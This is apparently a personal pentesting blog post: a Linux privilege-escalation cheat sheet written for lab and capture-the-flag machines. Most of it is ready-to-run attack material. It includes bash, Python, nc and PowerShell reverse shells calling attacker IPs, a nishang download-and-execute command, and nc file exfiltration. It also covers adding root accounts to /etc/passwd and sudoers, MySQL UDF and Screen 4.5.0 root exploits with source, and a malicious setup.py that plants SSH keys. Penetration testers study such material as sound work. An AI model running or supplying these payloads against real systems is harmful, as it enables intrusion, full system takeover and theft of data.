Skip to main content

Privilege Escalation

By

Priv Esc Links:


 1) https://gtfobins.github.io/ useful, privesc/jail-escape tasks

 2) Priv Esc Tech Explained Explained 2 Techniques Commands Priv Esc Techniques

3) Linux Restricted Shell Bypass Guide

Things to Check first for Linux Priv Esc


1.   sudo -l 

2.   sudo su

3.   uname -a                   /version --> check for vuln

4.   check for files with root priv

5.   check for cron jobs

6.   /etc/passwd file --> writable ?

7.   #PATH exploit

8.   check for process with root

9.   run pspy to check for running processes & cron jobs

10. Check .bash_history

11. ls -la the home directory

12. Check /opt/, /var/www/html, /home/, /root, / ,  directories thoroughly 

13. Check for World Readable files

14. Check if mysql is running as root. 

15. "mount" command to check for permissions on folders/processes 

16. Run "pspy -f"  on the target and check for all running file system tasks

17. Check for file/folder permissions, even u dont own the file, folder might be owned by you, where you can add/delete files/filenames.

Ex: File is running as Root; folder owner is you.; delete the file and create a new file with the same name. you can get root access. 




Binary PrivEsc:

file binary

strings binary 

cat binary

ls -la binary

Check the file to see if its executing any commands. 

Check for the file paths; 

If the command is cat instead of /bin/cat --> path injection might be possible 

decrease the size of terminal and check for changes

less binary

./binary | less   //Try Getting an Interactive shell with less
      //Then !Command to execute the command, it might only work with a definite screen size

./binary anycommand && /bin/bash 
sudo -l            --> Check for root priv directories and applications
sudo -u USERNAME /PATH/PROGRAM.sh shell.sh
sudo bash                --> Get Root Shell
id                --> get the user privilegs

When id is not installed use this script

awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
Check Version and Distribution

uname -a   cat /proc/versioncat /etc/issue
cat /etc/lsb-release 
sudo id                    --> Check Privilege level
ps aux | grep root             --> check for Applications running with root
netstat -tulpn                   --> see all connections, local and foreign

netstat -a                    --> find all listening ports

When netstat is not installed use this netstat without netstat -  awk script
python -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'


 --> spwan a python shell; sometimes python3 works as well
Get Interactive Shell:

python -c 'import pty;pty.spawn("/bin/bash")'
ctrl +Z 
stty raw -echo
fg
export TERM=xterm 
Grep Recursively for a string   

grep -iRI 'password'

#Grep for a user/string 
grep bhanu /etc -R 2>/dev/null
Port Scanning using nc

echo "" | nc -nvw2 [targetIP] [port-range]

echo "" | nc -nvw2 10.10.10.10 20-100
Finding Files with Root Privileges: 

find / -perm -4000 2>/dev/null | xargs ls -la

Finding World Readable Files:
find / -perm -2 ! -type l -ls 2>/dev/null

World Writable & Executable files
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

World Executable Folders:
find / -perm -o x -type d 2>/dev/null

Find SUID & SGID  Binaries:
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done 

find / -perm -1000 -type d 2>/dev/null     #Only the owner of the directory or the owner of a file can delete or rename here.

find / -perm -g=s -type f 2>/dev/null      #SGID (chmod 2000) - run as the group, not the user who started it.

find / -perm -u=s -type f 2>/dev/null      #SUID (chmod 4000) - run as the owner, not the user who started it.
List the Capabilities of files  which has Root Privileges

getcap -r / 2>/dev/null 

#List all Capabilities 
capsh --print
Find Services Running Behind Firewall/Localhost 

netstat -ano

netstat -tulpn

netstat -pantu | grep LIST    #View listening ports 
Try Sudo inject 
https://github.com/nongiach/sudo_inject  
CRON Jobs 

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root 
Ping Sweep

for i in {1..254} ;do (ping -c 1 10.10.10.$i | grep "bytes from" &) ;done 
find . -type f -ls         --> /Find files in all directories 
lsof -l                  --> View Running Processes 
echo os.system("/bin/bash")       --> Escaping Limited Shell using ssh 
  
gcc exploit.c -pthread -lcrypt -o Exploit  --> Compile The Exploit

gcc -m32 -Wl,--hash-style=both 9542.c -o exploit  

./Exploit 
cat .bash_history   -->  Check the Commands History
sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/ -o allow_other  --> Mount a share folder in your kali machine
 
 df -h                --> Get List of Machine Partitions (Mounted Devices as well)  
/dev/shm            --> World writable directory 
cat /dev/sdb               --> Might contain deleted data in the partition
                               can try strings /dev/sdb for flags
python -m SimpleHTTPServer 8080  --> Start a communication server on your system

wget http://yourip/LinuxEnum.sh  --> Run this in target machine to get this file
Send a File From Kali To Victim

nc -nlvp 9001 < exploit.c  --> Transfer files from Kali 

nc YourIpAddress 8001 > /tmp/exploit.c  --> Get the file On Target Machine

Get a File From Victim to Kali

on Kali: nc -l -p 8001 > filefoldername

on victim: nc -w 5 10.10.14.14 8001 < /usr/local/bin/filename 
Adding a Route to a different network which is accessible

#sudo ip route add CIDR dev Interface
sudo ip route add 10.10.0.0/24 dev tun2 
When anything can only be run as a specific user:

sudo -u UserName /bin/bash             /works when you see this in sudo -l       
Getting Root using PATH INJECTION:

This can be done for relative paths only (my-program) 
which is actually in /bin/my-programs, but shown as my-program in process list.

This can be exploited by 

1) In process list --> full path should not be specified, relative path should be shown

2) check when my-program is running, what is causing it to run and make it run.

3) Check the original location by "which my-program" command.

          /bin/my-program

4) For this exploit to work you should have write access to any relative folders like 
   /usr/local/bin; if /usr/local/bin is before /bin, we should be able to exploit this

         echo $PATH       //get the path info
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
This is mandatory for this to work, because my-program first checks for 
/usr/local/bin directory as its first on the list and if the file "my-program"
is available in the first directory itself - its gonna stop searching furthur. 
5) now go to "cd /usr/local/bin" create a file with the same name as the program

        vi my-program

6) add a reverse shell in the my-program and make it run from external force which 
   can get you root shell. dont forget to chmod +x my-program
Priv Esc using Path Injection 

this technique can be used when an absolute path is not defined for an executable in any script or sercice

cd /tmp
echo 'bash -i >& /dev/tcp/10.10.10.10/9002 0>&1' >gzip
echo  'chmod u+s /bin/bash' > suid
chmod +x gzip
export PATH=/tmp:$PATH

#execute the script as root which is using gzip(example) in it. 
sudo /opt/script.sh

#SUID permission should look like
#-rwsr-xr-x 1 root root 1113504 Jun  6  2019 /bin/bash

#for suid permissions run
/bin/bash  -p
Exploiting the Binary's Path Used in a Binary


for example in a binary /usr/local/bin/devil  (Has ROOT Privs) - there is a command which uses "cat" and 
calling a file from /home/freak ;  

cd /home/freak/

echo "/bin/sh" > cat 
export PATH=/home/freak:/freak:$PATH
/usr/local/bin/devil                 /GET ROOT 
Decode Binary to ASCII for Orchid CMS 

perl -lpe '$_=pack"B*",$_' < <( echo 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001 )
Dumping Data from Mysql

mysqldump -uUserNAME -pP@$$w0rd DB_NAME 

Getting Root Using Mysql; When mysql is running as root -- Priv Esc


locate udf             ///usr/lib/lib_mysqludf_sys.so --> this is essential for this exploit to work.

mysql -u root -p 
select sys_exec('usermod -a -G admin john')   //Giving root privileges

ctrl + C 

sudo su    //enter user password .. you are root now 


Method II:
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

select sys_exec('chmod u+s /bin/bash');

ctrl + c 

bash -p

Reference - Windows & Linux


Method - III -> Mysql 4.x - 5.x

searchsploit -m exploits/linux/local/1518.c

on Target Machine: 

cd /tmp
wget http://192.168.0.2/1518.c

cp 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c

gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc


mysql -u root -p


use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/raptor_udf2.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
//If this doesnt work try this --> 
                  select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

select * from mysql.func;

select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');

\! sh

cat /tmp/out

exit
exit 

cd /tmp 

vi getroot.c     //add the below content to this 

int main()
{
 setresuid(0, 0, 0);
    setresgid(0, 0, 0);
    system("/bin/bash");
    return 0;
}
mysql -u root -p 
select * from mysql.func;

//Creating a SUID Binary

select do_system('gcc -o /tmp/getroot /tmp/getroot.c');

select do_system('chmod u+s /tmp/getroot');

exit 
exit 
cd /tmp
./getroot
 

For Windows Follow This --> Github Exploit  Video Tutorial 
Cracking mysql Hashes

mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;

#sample hash
$1$llol$srpNQb9srgHAqNAes0FGC1

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt 
Postgresql Is Running As Root

psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr  //Enter Password later 

\dt    \\List Tables
\dp     \\Get DB privileges
select * from table_name; \\ Check Home Directory (just in case) 

Example to Update a value in all rows:
update table_name set gid=0 where gid=1001; \Giving Root Privs

or 
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');


Priv Esc When CAT is being used in system() function"

when an executable file is running cat in a system("cat /home/bhanu/root.txt"),
we can create a new path variable to our required directory, which results in
loading the last set path first and checks for the executable first in the last set 
directory. 

echo $PATH
//      /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

echo "/bin/bash" > cat

chmod 777 cat 

export PATH=/home/bhanu

echo $PATH
//      /home/bhanu

./file_to_run           /This file has the system() function with cat

#You get a new shell :) but as we deleted all the path variables - nothing will work,

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin   
Port Scanning with NMAP:

for ip in $(seq 1 65535); do nc -nvzw1 VICTIM_IP $p 2>&1; done | grep open
Port Forwarding using SoCat:

Start a socat listener on Victim_macine2 - Port 8009 & 8080, and listen it on First compromisted machine.

From Victim-1 machine: do a port scan as above and port forrward the required ports
/Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &  
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & 

netstart -plunt    /View the binded ports, we can see 8009 & 8080 in Victim_machine1


Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: 
socat tcp-listen:4321,fork tcp:KALI_IP:4321 & 


Priv Esc When NMAP Is running as root

/usr/local/bin/nmap  --interactive

!sh 
Priv Esc When wget is running as root

Copy the /etc/passwd from the target machine 

On KALI: 

paste the /etc/passwd from the target and add this line at the end.

bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash

on Target:

sudo wget -O /etc/passwd http://10.10.14.13/passwd
 
su bhanu
password
Priv Esc When Find is Running as root 
find /home -exec sh -i \;
Priv Esc when "Perl"  is running as root

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Priv Esc When "PWD" is being used in a Binary

export PWD=\$\(/bin/bash\)            //In the same directory as of the binary 
Priv Esc with Spice Ports

netstat -anlp | grep LIST

127.0.0.15900 
127.0.0.15901 
127.0.0.15902               //are running 

ps -ef | grep 5900         // shows what it is --> spice Port; libvert+

On Kali:

remote-viewer           // apt install virt-viewer

proxychains remote-viewer spice://127.0.0.1:5900

proxychains remote-viewer spice://127.0.0.1:5901

proxychains remote-viewer spice://127.0.0.1:5902

when VNC opens --> send key --> ctrl+alt+del --> system reboots

interrupt the process --> press e 

go to last but one line --> change "ro" to rw init=/bin/sh

passwd              //change the password
sync
Priv Esc when you have snmpd.conf - rwcommunity string

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD 10.10.10.10 
‘nsExtendStatus.”evilcommand”‘ = createAndGo 
‘nsExtendCommand.”evilcommand”‘ = /usr/bin/python3 
‘nsExtendArgs.”evilcommand”‘ = ‘-c “import 
sys,socket,os,pty;s=socket.socket();s.connect((\”KALI_IP\”,PORT));[os.dup2(s.fileno(),fd)
 for fd in (0,1,2)];pty.spawn(\”/bin/sh\”)”‘ 
Priv Esc/Enum when 121111 is running 

telnet 127.0.0.1 11211
stats cachedump 1 0
get name1
get name2
Priv Esc When /etc/passwd is World Writable

openssl passwd -1 -salt freak password 
      --> used to generate salted password for /etc/passwd file; 
freak = salt 
password = password

$1$freak$/IWD8R6aL2zyhUZPUeAXm. --> Hashed Password

username: Salted Value of username and password:0:0::root:/root:/bin/bash 
                --> create a new account with Root privileges 

echo 'bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash' >>/etc/passwd
            --> add this entry to /bin/passwd to get root access
su bhanu password: password 
Priv Esc Using Python Library Hijacking 

Rastalab - Python Library Hijacking 

# go to the location of hte python scipt that you are trying to hyjack - 
#which is running as a root or any required user 

python -c 'import sys; print "\n".join(sys.path)'

#select a library, ex: shutil; go to a writable directory
mkdir fakelib
cd fakelib
nano shutil.py

import os

def make_archive(a, b, c):
 os.system("nc 10.10.10.10 9001 -e '/bin/sh'")


#exit 
#for example; if you can run root_script.sh as root without pass and it uses some python script 
sudo PYTHONPATH=~/fakelib /opt/scripts/root_script.sh
Priv Esc When Sysinfo is running as root

mkdir /tmp/hack
cd /tmp/hack

nano lshw    or fdisk   or anyother command that is executed when you run sysinfo

#Add a reverse shell in the file 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

chmod +x filename 

#add the folder to path, so that when sysinfo runs - it checks the path first

export PATH=/tmp/filename:$PATH

sysinfo
Priv Esc When /bin/bash or /bin/sh is SUID 
/bin/bash -p             / -p == runs without changing privs  
/bin/sh -p              / -p == runs without changing privs 
Priv Esc for Sudo 1.8.27 -- (ALL, !root) /bin/bash

sudo -u#-1 /bin/bash
Priv Esc When luvit can be run without Password 

sudo -u USERNAME /home/sysadmin/luvit -e 'os.execute("/bin/bash")' 
Priv Esc when a User is running in Docker

https://gtfobins.github.io/gtfobins/docker/

docker images

docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
 
Priv Esc when Snapd (< 2.37.1 is running

snap version               //Check for version - anything before 2.37.1 is vulnerable

Use this exploit          // Creates a new account 


su dirty_sock            //password: dirty_sock


snap changes            //See changes - if sudo doesnt work



Priv Esc When Screen 4.5.0 is running as Root

https://www.exploit-db.com/exploits/41154 

save the below content into rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

gcc -o /tmp/rootshell /tmp/rootshell.c   //Compile it


save the below content into libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c   //Compile it


copy both the executable into /tmp directory in the target machine ..

Follow the below commands:

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
screen -ls
/tmp/rootshell 
When Wildcard is used in Sudo 

sudo -l 

//Wildcard example --> /home/*/*/file.txt (This case is vulnerable)
/var/www/*/*/file.txt

dpkg -l sudo             //1.8.16 sudo is vulnerable 

searchsploit sudoedit

searchsploit -m linux/local/37710.txt

Exploitation:

mkdir folder1
cd folder1
mkdir folder2
cd folder2
ln -s /home/username/.ssh/authorized_keys file.html      //Create a symbolic link 

sudoedit -u username /var/www/folder1/folder2/file.html  //add id-rsa.pub here 

OR

sudoedit -u username /var/www/ .ssh/authorized_keys /file.html    //text editor will open the text as 2 files, where .ssh/authorized_keys can be edited

On Kali: ssh-keygen   //Copy the id_rsa.pub to authorized_keys which is file.html

ssh -i id_rsa username@IP_ADDRESS 
Priv Esc with Ldapseach 

Might be useful --> Ldapsearch usage by Digital Ocean

cd /home/user/
cat ~/.ldaprc       # if you read/see this file - you can authenticate

#Enumerate Users
ldapsearch -x -LLL -w P@SSWORD!    

ldap can be used to exploit ssh access. if you have permission to ldap - 
you can change the permission of a user and make them root user and allow ssh access

#Select a proper/useful group which has more priv than you ex;root/sudo 
cat /etc/group

#Create a SSH public and private key 
ssh-keygen -t rsa -f filename

#Select a user from the ldapseach results --> save the below into bhanu.idi
#Modify  gidNumber & sshPublicKey

dn: uid=bhanu,ou=users,ou=citrix,ou=servers,dc=steins,dc=local
changetype: modify
replace: homeDirectory
homeDirectory: /root
-
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDF3YcLaP/D6s/u2bpsdAGcazs7sGTiQq9VUqe6i07vNzNeVk64Ua/vAZ7YZ5UTc8879aAOKWIAy9ivh2H6iB2qqAIxD9x+lZE4PsAy9ViFxkVUqzsFZ7fwyeqreDXH/8JB/EqoU2+lV564PvfH4WgUU1w3zgeeQ9NvWQTPHQcvuHYnDMPOntLWmLwQIAQMoEwbsH3Tdc0yfkvtY5j8E1USySyiPt+yYbLQNWuJ0eEPHivlLWphd84fl5kIEVUYHJEvZXRAthrq2b+G/DeIDqps6UVbLQt8vQt2z7ZjtnwZS4xAO2WeBn30hisdKpOov81D4AQBHYo5BeIZlFeH/oEExybph93TRZpQL9RwmMsql84tkvOPfGZrUTCQ7PUTQN03+9GKFyJcdPIQdC5OM3DA+P/eO8jLftVJsenDKk560nbrhCiTTCNhn7rijfMxOTwyTStuZ7rryuP7rYYI+hNv3J5zof8LYf6a8435IUT9foN9KtHTO64502V1BbMqJBM=
-
replace: userPassword
userPassword: P@ssword!
-
replace: gidNumber
gidNumber: 55

#Run ldapmodiy query to change the user's password and gid
ldapmodify -D "cn=currnet_user,dc=steins,dc=local  -w P@SSWORD! -f bhanu.ldi
Priv Esc when Pypi Server is running 

Get the steps from here

mkdir shit
touch setup.py setup.cfg README.md
mkdir shit
cd shit
nano __init__.py

def hello_word():
    print("hello world")

nano ../setup.py

from setuptools import setup

try:
        print('Yo, let me save my ssh key on your machine, so tht ic an login ')
        with open ('/home/low/.ssh/autorized_keys','w+') as f:
                f.writelines('ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCfz8MF+Oae5$

except:
        setup(
        name='Shit_Program',
        packages=['shit'],
        description='Hello world enterprise edition',
        version='0.1',
        url='http://pypi.sneakycorp.htb/shit',
        author='shit',
        author_email='shit@bhanu.notes',
        keywords=['pip','shit','example'])

 

nano ../setup.cfg 
[metadata]
description-file = README.md

cd ..
python3 setup.py sdist
cd dist
export HOME=/tmp/shit
cd ..
nano .pypirc
[distutils]
index-servers = 
        pypi
        shit
[pypi]
username:
password:
[shit]
repository: http://127.0.0.1:5000
username: pypi
password: password

python3 setup.py sdist upload -r shit 
Output: 
running upload
Submitting dist/Shit_Program-0.1.tar.gz to http://127.0.0.1:5000
Server response (200): OK


cat /home/low/.ssh/authorized_keys      #our ssh key 
Priv Esc When Pip is running with no Passwd

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip3 install $TF

Priv Esc for chkrootkit

cd /etc/crontab    //chkrootkit is running 

dpkg -l chkrootkit  // chkrootkit     0.49-4ubuntu1.

searchsploit -m exploits/linux/local/33899.txt

cd /tmp 

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

sudo su   //After the crontab time, run this and get root :) 
PrivEsc When Dbus is Running 
  

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /home/root.txt true 

resource

Escaping Limited Shell via SSH


ssh bhanu@10.10.10.10 -t "/bin/bash"      --> Escaping Limited Shell using ssh

Running Applications using SSH

ssh 10.10.14.37@10.10.10.119 "/usr/sbin/tcpdump -i ens33 -U -s0 -w - 'not port 22'" > network.cap

-s0 = capture everything; -w - = write the data; 'not port 22' = do not capture port 22 traffic 

wireshark -k network.cap               //-k = view the live traffic capture immediately.

ssh 10.10.14.37@10.10.10.119 "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark -k -i -
//View Live Traffic
cmd /c dir \users\administrator     --> to execute in web shell
formurl = -o uploads/revshell.php //10.10.14.3/revshell.php 
           -> uploading a reverse shell from BurpSuite; 
                          - o Destination Source
run the shell using IP/uploads/revshell.php and start a meterpreter 
find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
          --> all files and dir with root access 
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh 
                  --> get a proper shell from a restricted shell

Try all the commands from this link one by one to get a complete shell 
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf 

mysql -u root -p               // logging as a root in mysql 

\! ls -l                       //Execute Commands 
Connecting to SQL Server:

sqsh -S 10.10.10.59 -U username -P passaword

xp_cmdshell 'whoami'            /execute commands

//If xp_commandshell is not turned on --> follow this 

EXEC SP_CONFIGURE 'show advanced options', 1
EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
xp_cmdshell 'whoami'
go

Getting a Reverse Shell
cp nishang/Shells/Invoke-PowerShellTcp.ps1 .

Add this line at the end of the file & Save it
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.11 -Port 900

python -m SimpleHTTPServer 8001

nc -nvlp 9001

xp_cmdshell "powershell IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/nishang.ps1')"

we get shell on netcat connection
Finding Passwords from a PCAP file using TCPDUMP:
tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='
Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...
Post a Comment
Read more